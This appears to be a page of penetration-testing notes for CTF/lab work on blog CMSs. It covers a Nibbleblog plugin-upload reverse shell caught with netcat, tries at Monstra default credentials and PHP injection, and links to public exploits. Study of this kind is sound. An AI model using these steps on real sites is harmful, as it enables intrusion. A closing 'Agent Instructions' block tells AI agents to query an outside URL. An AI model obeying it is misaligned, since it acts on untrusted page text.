# Blogs

## Priority

* Extends > Themes "Helloworld" > Save
* System > Backup > Content > Files > Save something
* System > Settings > Maintenance Mode \<?php phpinfo(); ?> ..Save
* Plugins are often exploitable
* searchsploit
* github 'issues'

## REF

* [DirbNiktoWP ](/02-scanning/02-dirb-masscan-pings.md)- Also has webapp/cms/scanner

## Nibbleblog

* <https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html>
* Obtain Admin credentials > Activate My image plugin by visiting
* <http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image>
* Upload PHP shell, ignore warnings Visit
* <http://localhost/nibbleblog/content/private/plugins/my_image/image.php>
* No matter what you NAME the php upload.. it will ALWAYS be "image.php" after uploading

```
Setup reverse.php
Upload: "reverse.php" with my IP

Execute:
http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php

nc -nvlp 4444
Connected!
```

## Monstra

* TartarHTB

```
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails

-----------------------
-----------------------
searchsploit monstra
github monstra > Issues > 
php code execution
Look for sqli or lfi
```

## Gym Management

REF: Redteam CTF Defcon\
Pivonka found this vuln on his own!\
Actually a pubic/known exploit

* <https://www.exploit-db.com/exploits/48506>
* <https://github.com/ratik92/gymmanagementsystem>
* <https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromjpeg>
* <https://medium.com/@asdqwedev/remote-image-upload-leads-to-rce-inject-malicious-code-to-php-gd-image-90e1e8b2aada>
* <https://gist.github.com/asdqwe3124/e63eba35dc8e6976af97f1a9348b277b>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/blogs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.